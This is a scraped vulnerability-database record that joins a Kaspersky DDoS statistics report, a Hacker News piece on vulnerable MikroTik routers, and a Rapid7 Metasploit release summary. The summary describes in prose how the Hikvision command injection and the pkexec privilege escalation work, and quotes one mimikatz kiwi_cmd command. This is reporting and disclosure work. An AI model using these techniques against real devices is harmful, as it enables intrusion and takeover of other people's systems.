([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154823/04-en-ddos-report-q4.png>))_\n\nIn fourth place by number of targets is Germany (4.67%), followed in fifth by the UK (3.58%). Next come France (3.28%) and Canada (2.98%). The share of these four countries increased slightly in Q4, and they moved up one rank from Q3. Eighth by number of unique targets was the Netherlands (2.76%), whose share almost doubled, and rounding out the TOP 10, as in the ranking by number of attacks, were Singapore (2.49%) and Brazil (2.37%), whose share almost halved.\n\n### Dynamics of the number of DDoS attacks\n\nDuring Q4, our DDoS Intelligence system recorded 86,710 DDoS attacks on resources worldwide. In contrast to the previous reporting period, which saw several unusually stormy days, the attacks were distributed relatively evenly throughout the quarter: from 500 to 1,500 per day. However, we did see a surge in DDoS activity on October 11, with 2,606 attacks in 24 hours. November, meanwhile, was marked by two notable drops in DDoS activity: on November 9\u201311 and 23\u201330, the number of attacks fell below 500 per day. Curiously, the first drop came on Chinese Singles' Day and the second on Black Friday. Both dates are associated with massive online sales, which tend to cause a spike in various kinds of web attacks.\n\n_Dynamics of the number of DDoS attacks, Q4 2021 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2022/02/09160339/05-en-ru-es-ddos-report-q4.png>))_\n\nAs we noted above, Q4 lacked the dramatic bursts of DDoS activity seen in its predecessor. This was reflected also in the distribution of attacks by day of the week: the spread between the most and least active days was 5.02%, down 2.72 p.p. on Q3. We observed the most DDoS attacks on Sundays (16.61%) \u2014 this day's share in the distribution of attacks climbed by 0.66 p.p.; Thursday (11.59%) remained the quietest day, despite its share increasing slightly. The shares of Monday (15.78%), Tuesday (14.17%) and Friday (14.58%) also increased, while those of Wednesday (12.67%) and Saturday (14.60%) decreased, with Wednesday in Q4 being the second calmest day after Thursday.\n\n_Distribution of DDoS attacks by day of the week, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154916/06-en-ddos-report-q4.png>))_\n\n### Duration and types of DDoS attacks\n\nIn Q4, we observed an increase in the share of very short (less than 4 hours) DDoS attacks, which accounted for 94.29% of the total, plus a significant drop in the number of long ones: only 0.02% of attacks lasted more than 100 hours. What's more, the longest attack in the quarter was one-third shorter than the longest in the previous reporting period \u2014 218 hours, or just over nine days. Consequently, the average DDoS attack duration fell once more, this time to just under two hours.\n\n_Distribution of DDoS attacks by duration, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154944/07-en-ddos-report-q4.png>))_\n\nIn terms of attack types, in Q4 we again saw a redistribution of forces. UDP flooding came out on top again, with more than half of all attacks deploying this method. The share of TCP flooding (30.75%) also increased markedly, while that of SYN flooding (16.29%) decreased more than three times. HTTP (1.33%) and GRE flooding (1.32%) stayed put, although their shares increased slightly.\n\n_Distribution of DDoS attacks by type, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155033/08-en-ddos-report-q4.png>))_\n\n### Geographic distribution of botnets\n\nThe most botnet C2 servers active in Q4 were located in the US (46.49%), whose share increased by 3.05 p.p. against the previous reporting period. The Netherlands (10.17%) and Germany (7.02%) swapped places. A further 6.78% of C2 servers were located in the Czech Republic, whose share grew almost by 3 p.p., while Canada and the UK each had a 3.15% slice. France hosted 2.91% of the active botnet infrastructure, while 2.66% of C2 servers operated out of Russia. Also in the TOP 10 countries by location of botnets were Vietnam (1.94%) and Romania (1.45%).\n\n_Distribution of botnet C2 servers by country, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155106/09-en-ddos-report-q4.png>))_\n\n### Attacks on IoT honeypots\n\nAs for bots attempting to expand botnets in Q4, the largest share of devices that attacked Kaspersky SSH honeypots were located in China (26.73%), the US (11.20%) and Germany (9.05%). At the same time, the share of the first two countries decreased, while the latter added 3.47 p.p. against Q3. Another 5.34% of active bots were located in Vietnam, and 5.13% in Brazil. That said, the vast majority of attacks on our honeypots (70.96%) originated in Russia, where only 2.75% of attacking devices were located; while Vietnam accounted for just 7.94% of attacks, and the US 4.84%. This most likely means that at least one Russian bot showed a high level of performance.\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky SSH honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155150/10-en-ddos-report-q4.png>))_\n\nMost of the devices that attacked our Telnet traps, as in the previous quarter, were situated in China (44.88%), India (12.82%) and Russia (5.05%). The first country's share increased by 3.76 p.p., while the latter two saw a drop of 2.4 and 0.93 p.p., respectively. The lion's share of attacks on Kaspersky honeypots came from China (65.27%).\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky Telnet honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155228/11-en-ddos-report-q4.png>))_\n\n## Conclusion\n\nOn the one hand, Q4 met our expectations for this period; on the other, it surprised us. For example, instead of the expected increase in DDoS activity during major online sales, we saw a botnet lull. A feature of the quarter was the large number of very short DDoS attacks, as well as a slew of media reports about short but powerful attacks.\n\nNow for our forecasts. Going by previous years' trends, we expect Q1 2022 to produce roughly the same indicators as Q4 2021. But the situation in the world and, in particular, the cryptocurrency market is too volatile to make such a confident prediction. The bitcoin price has fallen to half its peak value, but remains high. It suffered a similar collapse in the middle of last year, but after that grew even stronger. If cryptocurrencies shoot up again, we could see a significant drop in the DDoS attack market, but if they sink even further, we will probably see an increase. It is impossible to predict which way it will go. But despite the lack of concrete information, we see no preconditions for any major fluctuations, and expect figures similar to those in Q4.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-10T10:00:04", "type": "securelist", "title": "DDoS attacks in Q4 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6079", "CVE-2021-22205", "CVE-2021-36260", "CVE-2021-44228"], "modified": "2022-02-10T10:00:04", "id": "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "href": "https://securelist.com/ddos-attacks-in-q4-2021/105784/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEix1GGoHWyTZLIUNdkduXaLWZZLCDe-TrjKwb4KKIrRL4PHcksUfqokWOurA4_ELZuNKNgm7Lzql76g_MpF-S_rgaKWevi5N6GiIt-9KqwMvkGlA2FQ-8z0y745lviXIaO0r3idvFlLM9TuheAqeofoGLiUva3NgbZcTa9dIglhiqGnTrSFOQSgRIlQ>)\n\nAt least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier of routers and wireless ISP devices.\n\nThe most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News.\n\n\"These devices are both powerful, [and] often highly vulnerable,\" the researchers [noted](<https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/>). \"This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (aka 'C2'), traffic tunneling, and more.\"\n\nMikroTik devices are an enticing target not least because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by threat actors to mount an array of intrusions.\n\nIndeed, earlier this September, reports emerged of a new botnet named [M\u0113ris](<https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html>) that staged a record-breaking distributed denial-of-service (DDoS) attack against Russian internet company Yandex by using network devices from Mikrotik as an attack vector by exploiting a now-addressed security vulnerability in the operating system ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)).\n\nThis is not the first time MikroTik routers have been [weaponized](<https://thehackernews.com/2018/10/router-hacking-exploit.html>) in real world attacks. In 2018, cybersecurity firm Trustwave [discovered](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them. The same year, China's Netlab 360 [reported](<https://thehackernews.com/2018/09/mikrotik-router-hacking.html>) that thousands of vulnerable MikroTik routers had been surreptitiously corralled into a botnet by leveraging CVE-2018-14847 to eavesdrop on network traffic.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjf-4TWedeGUlB_bMho_dY9tqYdz2Kvj7mLWtDTd0RfxyFAPtJXH2iyPwIJiltFNdCSHJBCWFoXv1M8Qr4AmqvvTF1dqJ33YucavckSpyBXtrf9w8Pna61zVy5EClw8XTx0MaP6ip-wBZn1j981BgwLTMh-GaRILYXmEwAs1Mkn1CbIkUXo7jicATJX>)\n\nCVE-2018-14847 is also among the four unaddressed vulnerabilities discovered over the last three years and which could enable full takeover of MikroTik devices -\n\n * [**CVE-2019-3977**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3977>) (CVSS score: 7.5) - MikroTik RouterOS insufficient validation of upgrade package's origin, allowing a reset of all usernames and passwords\n * [**CVE-2019-3978**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3978>) (CVSS score: 7.5) - MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning\n * [**CVE-2018-14847**](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) (CVSS score: 9.1) - MikroTik RouterOS directory traversal vulnerability in the WinBox interface\n * [**CVE-2018-7445**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7445>) (CVSS score: 9.8) - MikroTik RouterOS SMB buffer overflow vulnerability\n\nIn addition, Eclypsium researchers said they found 20,000 exposed MikroTik devices that injected cryptocurrency mining scripts into web pages that users visited.\n\n\"The ability for compromised routers to inject malicious content, tunnel, copy, or reroute traffic can be used in a variety of highly damaging ways,\" the researchers said. \"DNS poisoning could redirect a remote worker's connection to a malicious website or introduce a machine-the-middle.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhMqn1SEjfxCQg0TlmBiRLjns0oxiNeJVLGXoWWhWiK8dgSFy0p3HPV-OqMPAYNzppLMBBv9DcbckRiwOOq1Y1WX0dsivBlkPWPsOjRkalNB-gaEQGLm3g11ijAzOl1tJr6T5DfWiAzLCP4gtQd-zgTHz8jCpvtouAWe7ipGxduIgP3puqfo_C43uoR>)\n\n\"An attacker could use well-known techniques and tools to potentially capture sensitive information such as stealing [MFA](<https://en.wikipedia.org/wiki/Multi-factor_authentication>) credentials from a remote user using SMS over WiFi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic,\" the researchers added.\n\nMikroTik routers are far from the only devices to have been co-opted into a botnet. Researchers from Fortinet this week disclosed how the [Moobot botnet](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) is leveraging a known remote code execution (RCE) vulnerability in Hikvision video surveillance products ([CVE-2021-36260](<https://nvd.nist.gov/vuln/detail/CVE-2021-36260>)) to grow its network, and use the compromised devices to launch distributed denial-of-service (DDoS) attacks.\n\nIn a separate [report](<https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability>), the enterprise cybersecurity firm said that the operators of a botnet known as Manga aka Dark Mirai are actively abusing a recently disclosed post-authenticated remote code execution vulnerability ([CVE-2021-41653](<https://nvd.nist.gov/vuln/detail/CVE-2021-41653>)) to hijack TP-Link routers and co-opt the appliances to their network of infected devices.\n\n## Update\n\nIn a statement shared with The Hacker News, the Latvian company said that \"there are no new vulnerabilities in RouterOS,\" while stressing that keeping the operating system up to date is an \"essential step to avoid all kinds of vulnerabilities.\"\n\n\"Unfortunately, closing the old vulnerability does not immediately protect the affected routers. We don't have an illegal backdoor to change the user's password and check their firewall or configuration. These steps must be done by the users themselves,\" the company explained.\n\n\"We try our best to reach out to all users of RouterOS and remind them to do software upgrades, use secure passwords, check their firewall to restrict remote access to unfamiliar parties, and look for unusual scripts. Unfortunately, many users have never been in contact with MikroTik and are not actively monitoring their devices. We cooperate with various institutions worldwide to look for other solutions as well.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T11:15:00", "type": "thn", "title": "Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2018-7445", "CVE-2019-3977", "CVE-2019-3978", "CVE-2021-36260", "CVE-2021-41653"], "modified": "2021-12-10T11:53:59", "id": "THN:C96E59A0B083B41A78F431F292E7E1D5", "href": "https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-03-04T23:28:17", "description": "\n\nThis week\u2019s Metasploit Framework release brings us seven new modules.\n\n## IP Camera Exploitation\n\nRapid7\u2019s [Jacob Baines](<https://github.com/jbaines-r7>) was busy this week with two exploit modules that target IP cameras. The [first](<https://github.com/rapid7/metasploit-framework/pull/16190>) module exploits an authenticated file upload on Axis IP cameras. Due to lack of proper sanitization, an attacker can upload and install an `eap` application which, when executed, will grant the attacker `root` privileges on the device. This vulnerability, discovered by Baines in 2017, has yet to be patched.\n\nThe [second](<https://github.com/rapid7/metasploit-framework/pull/16204>) module exploits an unauthenticated command injection [vulnerability](<https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260?referrer=blog>) in a number of Hikvision IP cameras. A `PUT` request to the `/SDK/webLanguage` endpoint passes the contents of its request body\u2019s `<language>` tag to `snprintf()`, which then passes its resultant data to a call to `system()`, resulting in code execution with `root` privileges. This vulnerability has been [reported](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) as exploited in the wild.\n\n## Privilege Escalation in pkexec\n\nCommunity contributor [RootUp](<https://github.com/RootUp>) submitted a [module](<https://github.com/rapid7/metasploit-framework/pull/16103>) that exploits a privilege escalation [vulnerability](<https://attackerkb.com/topics/JGooJTBk81/cve-2021-4034?referrer=blog>) in Polkit\u2019s `pkexec` utility, an SUID binary that is present on most major Linux distributions. Additionally, this vulnerability has likely existed in `pkexec` since [2009](<https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt>).\n\nAny user can escalate their privileges to `root` by exploiting an out-of-bounds read and write that exists in `pkexec`\u2019s executable path-finding logic. The logic always assumes that an argument is passed to `pkexec`, resulting in a read of the data that follows arguments in memory. Environment variables follow program arguments, so `pkexec` reads the first environment variable, resolves its full path, and replaces the environment variable with the full path. Leveraging the `GCONV_PATH` environment variable coerces `pkexec` into loading arbitrary libraries, leading to escalation of privileges.\n\n## New module content (7)\n\n * [WordPress Modern Events Calendar SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/16131>) by Hacker5preme (Ron Jost), h00die, and red0xff, which exploits [CVE-2021-24946](<https://attackerkb.com/topics/afV2x8poTz/cve-2021-24946?referrer=blog>) \\- This exploits an unauthenticated SQL injection vulnerability in the Modern Events Calendar plugin for Wordpress.\n\n * [Wordpress Secure Copy Content Protection and Content Locking sccp_id Unauthenticated SQLi](<https://github.com/rapid7/metasploit-framework/pull/16182>) by Hacker5preme (Ron Jost), Krzysztof Zaj\u0105c (kazet), and h00die, which exploits [CVE-2021-24931](<https://attackerkb.com/topics/j2W7NOa1jw/cve-2021-24931?referrer=blog>) \\- A new module has been added to exploit CVE-2021-24931, an unauthenticated SQLi vulnerability in the `sccp_id` parameter of the `ays_sccp_results_export_file` AJAX action in Secure Copy Content Protection and Content Locking WordPress plugin versions before 2.8.2. Successful exploitation allows attackers to dump usernames and password hashes from the `wp_users` table which can then be cracked offline to gain valid login credentials for the affected WordPress installation.\n\n * [Axis IP Camera Application Upload](<https://github.com/rapid7/metasploit-framework/pull/16190>) by jbaines-r7 - The "Apps'' feature in Axis IP cameras allow allows third party developers to upload and execute 'eap' applications on the device, however no validation is performed to ensure the application comes from a trusted source. This module takes advantage of this vulnerability to allow authenticated attackers to upload and execute malicious applications and gain RCE. Once the application has been installed and the shell has been obtained, the module will then automatically delete the malicious application. No CVE is assigned to this issue as a patch has not been released as of the time of writing.\n\n * [Hikvision IP Camera Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16204>) by Watchful_IP, bashis, and jbaines-r7, which exploits [CVE-2021-36260](<https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260?referrer=blog>) \\- This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user.\n\n * [Local Privilege Escalation in polkits pkexec](<https://github.com/rapid7/metasploit-framework/pull/16103>) by Andris Raugulis, Dhiraj Mishra, Qualys Security, and bwatters-r7, which exploits [CVE-2021-4034](<https://attackerkb.com/topics/JGooJTBk81/cve-2021-4034?referrer=blog>) \\- This adds an LPE exploit for CVE-2021-4034 which leverages an out-of-bounds read and write in polkit's pkexec utility. It also adds support to Metasploit for generating Linux SO library payloads for the AARCH64 architecture.\n\n * [Firefox MCallGetProperty Write Side Effects Use After Free Exploit](<https://github.com/rapid7/metasploit-framework/pull/16185>) by 360 ESG Vulnerability Research Institute, maxpl0it, and timwr, which exploits [CVE-2020-26950](<https://attackerkb.com/topics/NuuSBUKQIb/cve-2020-26950?referrer=blog>) \\- This adds a module for CVE-2020-26950, a use after free browser exploit targeting Firefox and Thunderbird.\n\n * [#16202](<https://github.com/rapid7/metasploit-framework/pull/16202>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds an exploit for [CVE-2022-21882](<https://github.com/advisories/GHSA-m3vx-53cf-jqv4>) which is a patch bypass for [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>). It updates and combines both techniques into a single mega-exploit module that will use the updated technique as necessary. No configuration is necessary outside of the SESSION and payload datastore options.\n\n## Bugs fixed\n\n * [#16228](<https://github.com/rapid7/metasploit-framework/pull/16228>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where the framework failed to check if a payload would fit in the space defined by an exploit if the payload was not encoded.\n * [#16235](<https://github.com/rapid7/metasploit-framework/pull/16235>) from [bcoles](<https://github.com/bcoles>) \\- This change fixes an issue with APK injection when in some configurations an invalid apktool version string would cause injection to fail.\n * [#16251](<https://github.com/rapid7/metasploit-framework/pull/16251>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an error when executing commands using the Python Meterpreter where not all results were returned to msfconsole.\n * [#16254](<https://github.com/rapid7/metasploit-framework/pull/16254>) from [heyder](<https://github.com/heyder>) \\- This fixes an issue in the Shodan search module where recent changes to randomize the user agent were causing the results returned to the module to be in an unexpected format.\n * [#16255](<https://github.com/rapid7/metasploit-framework/pull/16255>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a parsing issue with kiwi_cmd arguments which contained spaces, such as `kiwi_cmd 'base64 /in:off /out:off'`.\n * [#16257](<https://github.com/rapid7/metasploit-framework/pull/16257>) from [bcoles](<https://github.com/bcoles>) \\- This change adds a warning when a user tries to inject the Android payload into an APK using an older version of apktool.\n * [#16264](<https://github.com/rapid7/metasploit-framework/pull/16264>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This fixes a crash when attempting to create create local module documentation with the `info -d` command when the provided GitHub credentials were invalid.\n * [#16266](<https://github.com/rapid7/metasploit-framework/pull/16266>) from [smashery](<https://github.com/smashery>) \\- This fixes bugs in how `msfconsole` tab-completes directory paths.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.31...6.1.32](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-24T11%3A00%3A46-06%3A00..2022-03-03T12%3A00%3A18-05%3A00%22>)\n * [Full diff 6.1.31...6.1.32](<https://github.com/rapid7/metasploit-framework/compare/6.1.31...6.1.32>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-04T21:52:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26950", "CVE-2021-1732", "CVE-2021-24931", "CVE-2021-24946", "CVE-2021-36260", "CVE-2021-4034", "CVE-2022-21882"], "modified": "2022-03-04T21:52:42", "id": "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "href": "https://blog.rapid7.com/2022/03/04/metasploit-wrap-up-150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\/Sl Firmware
